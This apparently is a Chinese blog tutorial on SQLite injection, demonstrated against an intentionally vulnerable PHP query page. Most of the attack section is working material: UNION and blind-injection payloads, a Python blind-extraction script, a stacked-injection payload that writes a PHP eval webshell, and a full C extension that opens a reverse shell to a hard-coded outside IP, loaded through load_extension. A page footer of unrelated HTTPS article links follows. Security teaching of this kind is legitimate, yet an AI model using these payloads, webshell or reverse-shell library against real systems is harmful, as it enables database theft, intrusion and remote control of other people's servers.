SQLite 数据库注入总结 sqlite数据库下载
suiw9 2024-11-09 14:52 35 浏览 0 评论
前言
SQLite 是一个进程内的库,实现了自给自足的、无服务器的、零配置的、事务性的 SQL 数据库引擎。它是一个零配置的数据库,这意味着与其他数据库不一样,您不需要在系统中配置。SQLite 与 MySQL 还是有些区别的,SQLite 直接读写普通磁盘文件,每一个数据库就是一个文件,可以按应用程序需求进行静态或动态连接其存储文件进行数据操作。
SQLite 基础
在本篇文章中我们使用 SQLite3 来学习,SQLite3 的语法与 MySQL 相似。详细语法可以在这里学习:https://www.runoob.com/sqlite/sqlite-tutorial.html。
SQLite 创建数据库
SQLite 的 sqlite3 命令被用来创建新的 SQLite 数据库。您不需要任何特殊的权限即可创建一个数据。如下:
root@ubuntu:~# sqlite3 DatabaseName.db
SQLite version 3.31.1 2020-01-27 19:55:54
Enter ".help" for usage hints.
sqlite>
上面的命令将在当前目录下创建一个文件 DatabaseName.db,该文件将被 SQLite 引擎用作数据库,并且 sqlite3 命令在成功创建数据库文件之后,将提供一个 sqlite> 提示符,该提示符用于交互式的操作库内的数据。我们可以使用 .database 命令来查看当前数据库:
sqlite> .database
main: /root/DatabaseName.db
SQLite 附加数据库
假设这样一种情况,当在同一时间有多个数据库可用,您想使用其中的任何一个。SQLite 的 ATTACH DATABASE 语句是用来选择一个特定的数据库。SQLite 的 ATTACH DATABASE 语句的基本语法如下:
ATTACH DATABASE file_name AS database_name;
打开的数据库和使用 ATTACH 附加进来的数据库的必须位于同一文件夹下。如果数据库尚未被创建,上面的命令将创建一个数据库。
如下,我们想附加一个现有的数据库 testDB.db:
sqlite> ATTACH DATABASE 'testDB.db' as 'TEST';
如下,执行 .database 命令后,可以看到成功附加了一个 TEST:
sqlite> .database
main: /root/DatabaseName.db
TEST: /root/testDB.db
在特定情况下,我们可以通过附加数据库的方式写入 Webshell。
SQLite 创建表
SQLite 的 CREATE TABLE 语句用于在任何给定的数据库创建一个新表。CREATE TABLE 语句的基本语法如下:
CREATE TABLE database_name.table_name(
column1 datatype PRIMARY KEY(one or more columns),
column2 datatype,
column3 datatype,
.....
columnN datatype,
);
如下实例,我们创建了一个 users 表,ID 作为主键,NOT NULL 的约束表示在表中创建纪录时这些字段不能为 NULL:
sqlite> CREATE TABLE users(
id INT PRIMARY KEY NOT NULL,
username TEXT NOT NULL,
password TEXT NOT NULL,
age INT NOT NULL
);
您可以使用 SQLIte 命令中的 .tables 命令来验证表是否已成功创建,该命令用于列出附加数据库中的所有表:
sqlite> .tables
users
您可以使用 SQLite .schema 命令得到表的完整信息,如下所示:
sqlite> .schema users
CREATE TABLE users(
id INT PRIMARY KEY NOT NULL,
username TEXT NOT NULL,
password TEXT NOT NULL,
age INT NOT NULL
);
SQLite Insert 语句
SQLite 的 INSERT INTO 语句用于向数据库的某个表中添加新的数据行。语法如下:
INSERT INTO TABLE_NAME [(column1, column2, column3,...columnN)]
VALUES (value1, value2, value3,...valueN);
下面的语句将在 users 表中创建四个记录:
INSERT INTO users (id,username,password,age) VALUES (1, 'Admin', '123456', 20);
INSERT INTO users (id,username,password,age) VALUES (2, 'Whoami', '657260', 19);
INSERT INTO users (id,username,password,age) VALUES (3, 'Bunny', '963756', 19);
INSERT INTO users (id,username,password,age) VALUES (4, 'Allen', '759135', 21);
SQLite Select 语句
SQLite 的 SELECT 语句用于从 SQLite 数据库表中获取数据,以结果表的形式返回数据。SELECT 语句语法如下:
SELECT column1, column2, columnN FROM table_name;
如下我们查询刚刚创建的 users 表:
sqlite> .header on
sqlite> .mode column # 前两个命令被用来设置格式化的输出
sqlite> SELECT * FROM users;
id username password age
---------- ---------- ---------- ----------
1 Admin 123456 20
2 Whoami 657260 19
3 Bunny 963756 19
4 Allen 759135 21
SQLite 注释
与 MySQL 常见的注释符 # 不同,SQLite 的注释符以两个连续的 "-" 字符(ASCII 0x2d)开始,并扩展至下一个换行符(ASCII 0x0a)或直到输入结束,以先到者为准。
您也可以使用 C 风格的注释,以 /* 开始,并扩展至下一个 */ 字符对或直到输入结束,以先到者为准。SQLite 的注释可以跨越多行。
sqlite>.help -- 这是一个简单的注释
SQLite sqlite_master 表
sqlite_master 表示 SQLite 的系统表,是为每个 SQLite 数据库自动创建的特殊表。该表记录该数据库中保存的表、索引、视图、和触发器信息,每一行记录一个项目。在创建一个 SQLite 数据库的时候,该表会自动创建。如下查看 sqlite_master 表的结构,发现其包含 5 列:
sqlite> .schema sqlite_master
CREATE TABLE sqlite_master (
type text,
name text,
tbl_name text,
rootpage integer,
sql text
);
- type:其值为 "table" 或者 "index"。
- name:这个表的名称或者索引。
- sql:创建表所使用的完整的 SQL 语句。
可知,sqlite_master 表中的 sql 字段中记录着你建表留下的完整的记录,也就是说我们在注入的时候可以通过查询 sqlite_master 表来获取数据库中的表名以及表结构,这就像我们在 MySQL 注入中查询 information_schema 一样。
同时,由于使用 CREATE 或 DROP 创建或销毁表在实际上与从特殊的 sqlite_master 表中执行 INSERT 或 DELETE 语句相同,所以当我们在特殊情况下可以通过操作 sqlite_master 表来创建或删除数据库表。
常见注入姿势
SQLite 注入的基本操作与 MySQL 注入相似,MySQL 有的 SQLite 基本都有,一个最大的不同就是没有 information_schema。
我们以下编写测试代码进行演示:
- index.php
<?php
class MyDB extends SQLite3
{
function __construct()
{
$this->open('DatabaseName.db');
}
}
$db = new MyDB();
if(!$db){
echo $db->lastErrorMsg();
} else {
echo "You can query users by ID.\n</br>";
}
$id = $_POST['id'];
$sql =<<<EOF
SELECT * from users where id='$id';
EOF;
$ret = $db->query($sql);
if($ret==FALSE){
echo "Error in fetch ".$db->lastErrorMsg();
}
else{
while($row = $ret->fetchArray(SQLITE3_ASSOC) ){
echo "ID = ". $row['id'] . "</br>";
echo "Username = ". $row['username'] ."</br>";
echo "Password = ". $row['password'] ."</br>";
}
//var_dump($ret->fetchArray(SQLITE3_ASSOC));
}
$db->close();
?>
测试闭合方式
正常查询:
尝试闭合单引号:
发现报错,说明当前闭合方式为单引号。
然后尝试使用分号 ; 闭合 SQL 语句:
1';
也可以使用 -- 进行注释:
1' --
也可以使用 /* 进行注释:
1'/*
查询 SQL 语句字段数
与 MySQL 一样,我们可以使用 UNION 语句来查询字段数:
-1' union select 1,2,3;
-1' union select 1,2,3 --
-1' union select 1,2,3/*
-1' union select 1,2,3,4;
-1' union select 1,2,3,4 --
-1' union select 1,2,3,4/*
可知当前字段数为 4,并且可以在 1、2、3 这三个位置回显。
查询表名和列名
这里直接通过查询 sqlite_master 表来实现:
-1' union select 1,2,(select sql from sqlite_master limit 0,1),4;
-1' union select 1,2,(select sql from sqlite_master limit 0,1),4 --
-1' union select 1,2,(select sql from sqlite_master limit 0,1),4/*
如上图所示,得到了当前表创建时的语句:
CREATE TABLE users(
id INT PRIMARY KEY NOT NULL,
username TEXT NOT NULL,
password TEXT NOT NULL,
age INT NOT NULL
)
从语句中我们得知当前表名为 users,其中有 id、username、password、age 这四个字段。
当存在多个表时,我们可以用 limit 关键字逐行读取,也可以使用 group_concat 关键字进行聚合:
-1' union select 1,2,(select group_concat(sql) from sqlite_master),4;
-1' union select 1,2,(select group_concat(sql) from sqlite_master),4 --
-1' union select 1,2,(select group_concat(sql) from sqlite_master),4/*
查询数据
得到表明和字段名之后我们便可以查询数据了:
-1' union select 1,2,(select group_concat(username,password) from users),4;
-1' union select 1,2,(select group_concat(username,password) from users),4 --
-1' union select 1,2,(select group_concat(username,password) from users),4/*
布尔盲注
根据查询正确或错误时的页面回显来判断数据内容:
-1' or length(sqlite_version())=5/*
-1' or length(sqlite_version())=6/*
# sqlite 中没有 ascii, mid, left 等函数
-1' or substr((select group_concat(sql) from sqlite_master),1,1)>'a'/*
-1' or substr((select group_concat(sql) from sqlite_master),1,1)<'a'/*
-1' or substr((select group_concat(sql) from sqlite_master),2,1)>'b'/*
-1' or substr((select group_concat(sql) from sqlite_master),2,1)<'b'/*
-1' or substr((select group_concat(sql) from sqlite_master),3,1)>'C'/*
-1' or substr((select group_concat(sql) from sqlite_master),3,1)<'C'/*
......
在爆 sql 字段时最好先 hex 编码一下。下面给出一个二分法盲注脚本:
import requests
url = 'http://192.168.219.130/index.php'
flag = ''
for i in range(1,500):
low = 32
high = 128
mid = (low+high)//2
while(low<high):
payload = "-1' or substr((select hex(group_concat(sql)) from sqlite_master),{0},1)>'{1}'/*".format(i,chr(mid))
datas = {
"id": payload
}
res = requests.post(url=url,data=datas)
if 'Username' in res.text: # 为真时,即判断正确的时候的条件
low = mid+1
else:
high = mid
mid = (low+high)//2
if(mid ==32 or mid ==127):
break
flag = flag+chr(mid)
print(flag)
print('\n'+bytes.fromhex(flag).decode('utf-8'))
# 4
# 43
# 435
# 4352
# 43524
# 435245
# 4352454
# 43524541
# 435245415
# 4352454154
# 43524541544
# 435245415445
# 4352454154452
# 43524541544520
# 435245415445205
# 4352454154452054
# 43524541544520544
# 435245415445205441
# 4352454154452054414
# 43524541544520544142
# 435245415445205441424
# ......
# CREATE TABLE users(
# id INT PRIMARY KEY NOT NULL,
# username TEXT NOT NULL,
# password TEXT NOT NULL,
# age INT NOT NULL
# )
时间盲注
SQLite 没有 sleep() 函数,但是有个 randomblob(N) 函数,其作用是返回一个 N 字节长的包含伪随机字节的 BLOG。 N 是正整数。可以用它来制造延时。
并且 SQLite 没有 if,所以我们需要使用 case...when 来构造查询语句:
-1' or (case when(substr(sqlite_version(),1,1)='3') then randomblob(1000000000) else 0 end)/*
执行 payload 后将有一段时间的延时。
SQLite 注入写入 Webshell
还记得我们之前说的 SQLite 附加数据库吗?当在同一时间有多个数据库可用,您想使用其中的任何一个。SQLite 的 ATTACH DATABASE 语句是用来选择一个特定的数据库,使用该命令后,所有的 SQLite 语句将在附加的数据库下执行。
ATTACH DATABASE file_name AS database_name;
如果附加的数据库不存在,则会先创建该数据库,如果数据库文件路径设置在 WEB 目录下,就可以实现写入 Webshell 的功能。
如下我们在 SQLite 中执行以下语句:
ATTACH DATABASE '/var/www/html/shell.php' AS shell; # 附加一个名为 shell.php 的数据库
create TABLE shell.exp (webshell text); # 为 shell 库创建一个表
insert INTO shell.exp (webshell) VALUES ('\r\n\r\n<?php eval($_POST[whoami]);?>\r\n\r\n'); # 插入数据
如上图所示,成功在 WEB 目录汇总生成了 shell.php,访问 shell.php 即可:
而在实际的 SQLite 注入中,写 Webshell 并没有那么简单,比如我们之前的测试代码:
- index.php
<?php
class MyDB extends SQLite3
{
function __construct()
{
$this->open('DatabaseName.db');
}
}
$db = new MyDB();
if(!$db){
echo $db->lastErrorMsg();
} else {
echo "You can query users by ID.\n</br>";
}
$id = $_POST['id'];
$sql =<<<EOF
SELECT * from users where id='$id';
EOF;
$ret = $db->query($sql);
if($ret==FALSE){
echo "Error in fetch ".$db->lastErrorMsg();
}
else{
while($row = $ret->fetchArray(SQLITE3_ASSOC) ){
echo "ID = ". $row['id'] . "</br>";
echo "Username = ". $row['username'] ."</br>";
echo "Password = ". $row['password'] ."</br>";
}
//var_dump($ret->fetchArray(SQLITE3_ASSOC));
}
$db->close();
?>
其中使用的是 query() 函数来执行 SQL 语句,这样的话就无法执行分号 ; 后面的内容,但如果我们将 query() 换成 exec(),此时将造成堆叠注入,这样便可以写 Webshell 了,并且 exec() 函数执行后没有回显。我们在注入的时候执行以下 payload 就行了:
-1';ATTACH DATABASE '/var/www/html/shell.php' AS shell;create TABLE shell.exp (webshell text);insert INTO shell.exp (webshell) VALUES ('\r\n\r\n<?php eval($_POST[whoami]);?>\r\n\r\n');/*
如何成功连接 Webshell:
SQLite 加载动态库
为了方便开发者可以很轻便的扩展功能,SQLite 从 3.3.6 版本开始提供了支持扩展的能力,通过sqlite_load_extension API(或者 load_extension 函数 ),开发者可以在不改动 SQLite 源码的情况下,通过动态加载的库(so/dll/dylib)来扩展 SQLite 的能力。与 MySQL 中 UDF 类似,如果我们让 SQLite 加载恶意的动态库,那我们便可以达到执行系统命令的目的。
下面我们尝试通过 load_extension 加载恶意扩展实现反弹 Shell。
首先根据 SQLite 官网的例子,编写一个 so 扩展:
/* Add your header comment here */
#include <sqlite3ext.h> /* Do not use <sqlite3.h>! */
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <signal.h>
#include <dirent.h>
#include <sys/stat.h>
SQLITE_EXTENSION_INIT1
/* Insert your extension code here */
int tcp_port = 2333;
char *ip = "47.101.57.72";
#ifdef _WIN32
__declspec(dllexport)
#endif
int sqlite3_extension_init(
sqlite3 *db,
char **pzErrMsg,
const sqlite3_api_routines *pApi
){
int rc = SQLITE_OK;
SQLITE_EXTENSION_INIT2(pApi);
int fd;
if ( fork() <= 0){
struct sockaddr_in addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(tcp_port);
addr.sin_addr.s_addr = inet_addr(ip);
fd = socket(AF_INET, SOCK_STREAM, 0);
if ( connect(fd, (struct sockaddr*)&addr, sizeof(addr)) ){
exit(0);
}
dup2(fd, 0);
dup2(fd, 1);
dup2(fd, 2);
execve("/bin/bash", 0LL, 0LL);
}
return rc;
}
然后编译:
gcc -g -fPIC -shared exp.c -o exp.so
# gcc -g -shared exp.c -o exp.dll
然后直接加载:
select load_extension('/root/exp.so');
如下图所示,成功反弹 Shell:
借助 SQLite 动态加载的这个特性,我们可以通过文件上传等方式在一个可预测的存储路径中预先放置一个覆盖 SQLite 扩展规范的动态库,然后通过 SQL 注入漏洞调用 load_extension,就可以很轻松地激活这个库中的代码,直接形成了远程代码执行漏洞:
而在 Android 平台中有漏洞利用经验的人应该都很清楚,想要把一个恶意文件下载到手机存储中,有许多实际可操作的方式,例如收到的图片、音频或者视频,网页的图片缓存等。
-1'||load_extension('./uploads/exp.so');/*
但是默认情况下 load_extension 是被禁用的。
参考文献
最后
关注私我获取【网络安全学习攻略·资料包】
相关推荐
- 俄罗斯的 HTTPS 也要被废了?(俄罗斯网站关闭)
-
发布该推文的ScottHelme是一名黑客,SecurityHeaders和ReportUri的创始人、Pluralsight作者、BBC常驻黑客。他表示,CAs现在似乎正在停止为俄罗斯域名颁发...
- 如何强制所有流量使用 HTTPS一网上用户
-
如何强制所有流量使用HTTPS一网上用户使用.htaccess强制流量到https的最常见方法可能是使用.htaccess重定向请求。.htaccess是一个简单的文本文件,简称为“.h...
- https和http的区别(https和http有何区别)
-
“HTTPS和HTTP都是数据传输的应用层协议,区别在于HTTPS比HTTP安全”。区别在哪里,我们接着往下看:...
- 快码住!带你十分钟搞懂HTTP与HTTPS协议及请求的区别
-
什么是协议?网络协议是计算机之间为了实现网络通信从而达成的一种“约定”或“规则”,正是因为这个“规则”的存在,不同厂商的生产设备、及不同操作系统组成的计算机之间,才可以实现通信。简单来说,计算机与网络...
- 简述HTTPS工作原理(简述https原理,以及与http的区别)
-
https是在http协议的基础上加了一层SSL(由网景公司开发),加密由ssl实现,它的目的是为用户提供对网站服务器的身份认证(需要CA),以至于保护交换数据的隐私和完整性,原理如图示。1、客户端发...
- 21、HTTPS 有几次握手和挥手?HTTPS 的原理什么是(高薪 常问)
-
HTTPS是3次握手和4次挥手,和HTTP是一样的。HTTPS的原理...
- 一次安全可靠的通信——HTTPS原理
-
为什么HTTPS协议就比HTTP安全呢?一次安全可靠的通信应该包含什么东西呢,这篇文章我会尝试讲清楚这些细节。Alice与Bob的通信...
- 为什么有的网站没有使用https(为什么有的网站点不开)
-
有的网站没有使用HTTPS的原因可能涉及多个方面,以下是.com、.top域名的一些见解:服务器性能限制:HTTPS使用公钥加密和私钥解密技术,这要求服务器具备足够的计算能力来处理加解密操作。如果服务...
- HTTPS是什么?加密原理和证书。SSL/TLS握手过程
-
秘钥的产生过程非对称加密...
- 图解HTTPS「转」(图解http 完整版 彩色版 pdf)
-
我们都知道HTTPS能够加密信息,以免敏感信息被第三方获取。所以很多银行网站或电子邮箱等等安全级别较高的服务都会采用HTTPS协议。...
- HTTP 和 HTTPS 有何不同?一文带你全面了解
-
随着互联网时代的高速发展,Web服务器和客户端之间的安全通信需求也越来越高。HTTP和HTTPS是两种广泛使用的Web通信协议。本文将介绍HTTP和HTTPS的区别,并探讨为什么HTTPS已成为We...
- HTTP与HTTPS的区别,详细介绍(http与https有什么区别)
-
HTTP与HTTPS介绍超文本传输协议HTTP协议被用于在Web浏览器和网站服务器之间传递信息,HTTP协议以明文方式发送内容,不提供任何方式的数据加密,如果攻击者截取了Web浏览器和网站服务器之间的...
- 一文让你轻松掌握 HTTPS(https详解)
-
一文让你轻松掌握HTTPS原文作者:UC国际研发泽原写在最前:欢迎你来到“UC国际技术”公众号,我们将为大家提供与客户端、服务端、算法、测试、数据、前端等相关的高质量技术文章,不限于原创与翻译。...
- 如何在Spring Boot应用程序上启用HTTPS?
-
HTTPS是HTTP的安全版本,旨在提供传输层安全性(TLS)[安全套接字层(SSL)的后继产品],这是地址栏中的挂锁图标,用于在Web服务器和浏览器之间建立加密连接。HTTPS加密每个数据包以安全方...
- 一文彻底搞明白Http以及Https(http0)
-
早期以信息发布为主的Web1.0时代,HTTP已可以满足绝大部分需要。证书费用、服务器的计算资源都比较昂贵,作为HTTP安全扩展的HTTPS,通常只应用在登录、交易等少数环境中。但随着越来越多的重要...
你 发表评论:
欢迎- 一周热门
-
-
Linux:Ubuntu22.04上安装python3.11,简单易上手
-
宝马阿布达比分公司推出独特M4升级套件,整套升级约在20万
-
MATLAB中图片保存的五种方法(一)(matlab中保存图片命令)
-
别再傻傻搞不清楚Workstation Player和Workstation Pro的区别了
-
Linux上使用tinyproxy快速搭建HTTP/HTTPS代理器
-
如何提取、修改、强刷A卡bios a卡刷bios工具
-
Element Plus 的 Dialog 组件实现点击遮罩层不关闭对话框
-
日本组合“岚”将于2020年12月31日停止团体活动
-
SpringCloud OpenFeign 使用 okhttp 发送 HTTP 请求与 HTTP/2 探索
-
tinymce 号称富文本编辑器世界第一,大家同意么?
-
- 最近发表
- 标签列表
-
- dialog.js (57)
- importnew (44)
- windows93网页版 (44)
- yii2框架的优缺点 (45)
- tinyeditor (45)
- qt5.5 (60)
- windowsserver2016镜像下载 (52)
- okhttputils (51)
- android-gif-drawable (53)
- 时间轴插件 (56)
- docker systemd (65)
- slider.js (47)
- android webview缓存 (46)
- pagination.js (59)
- loadjs (62)
- openssl1.0.2 (48)
- velocity模板引擎 (48)
- pcre library (47)
- zabbix微信报警脚本 (63)
- jnetpcap (49)
- pdfrenderer (43)
- fastutil (48)
- uinavigationcontroller (53)
- bitbucket.org (44)
- python websocket-client (47)